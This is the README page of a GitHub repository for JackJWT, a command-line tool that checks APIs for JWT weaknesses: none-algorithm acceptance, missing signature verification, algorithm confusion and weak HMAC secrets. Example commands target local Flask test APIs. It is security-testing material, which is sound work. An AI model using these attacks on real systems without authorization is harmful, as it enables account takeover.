Skip to content

kozlm/jackjwt

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
api
api
 
 
src
src
 
 
wordlists
wordlists
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

JackJWT - JWT Security Checker

Installation

To install the tool, clone the repository from GitHub, install the required dependencies, and run the script with the -h flag to verify the configuration.

git clone https://github.com/kozlm/jackjwt.git
cd jackjwt
pip install -r requirements.txt
python -m src.jackjwt -h
python src/jackjwt.py -h

You should see a help message showing all application options:

usage: jackjwt.py [-h] -u URL -t TOKEN [-w CLAIMS_WORDLIST] [-n] [-f] [-s SECRET_WORDLIST] [-c PUBLIC_KEY] [-v]

JackJWT - JWT Security Checker

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     API endpoint URL
  -t TOKEN, --token TOKEN
                        JWT token
  -w CLAIMS_WORDLIST, --claims-wordlist CLAIMS_WORDLIST
                        Custom wordlist with potentially vulnerable claims
  -n, --none-alg        Use 'None' algorithm attack
  -f, --no-verify       Check no signature verification
  -s SECRET_WORDLIST, --secret-wordlist SECRET_WORDLIST
                        Path to wordlist for JWT secret bruteforce
  -c PUBLIC_KEY, --public-key PUBLIC_KEY
                        Path to public key for algorithm confusion attack
  -v, --verbose         Enable verbose output

Usage

To run the tool, provide a sample JWT or a path to a file containing the token (-t), and the URL of a sample GET endpoint (-u) that returns status 200 when using the token. While not every test sends a request, the URL is always required. The tool checks the token's payload claims against a wordlist of potentially sensitive or vulnerable fields (e.g., api_token, is_admin). You can provide your own wordlist with the -w flag.

Additional vulnerability checks include:

  • No signature verification (-f) – sends a token with an invalid signature.
  • None algorithm usage (-n) – tries replacing the algorithm with None.
  • Algorithm confusion (-c) – uses a public key with a symmetric algorithm.
  • Weak secret (HMAC bruteforce) (-s) – attempts a dictionary attack on the secret locally.

The -v flag enables verbose output.

Project Structure

Directories

  • src – source code
  • wordlist – wordlists for JWT claims and secret bruteforce
  • api – test APIs, keys, and a helper script for fetching tokens

Testing and Examples

Test APIs built with Flask were used for demonstration.

Weak Secret and No Verification

Test API: api/app.py

Command:

python -m src.jackjwt.py -u http://127.0.0.1:5000/protected -t <token> -nf -s wordlists/vulnerable-fields.txt

None Algorithm

Test API: api/app_none.py

Command:

python -m src.jackjwt.py -u http://127.0.0.1:5000/protected -t <token> -nf

Algorithm Confusion

Test API: api/app_confusion.py

Command:

python -m src.jackjwt.py -u http://127.0.0.1:5000/protected -t <token> -c api/keys/public.pem

Verbose Mode

Command:

python -m src.jackjwt.py -u http://127.0.0.1:5000/protected -t <token> -c api/keys/public.pem -v

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages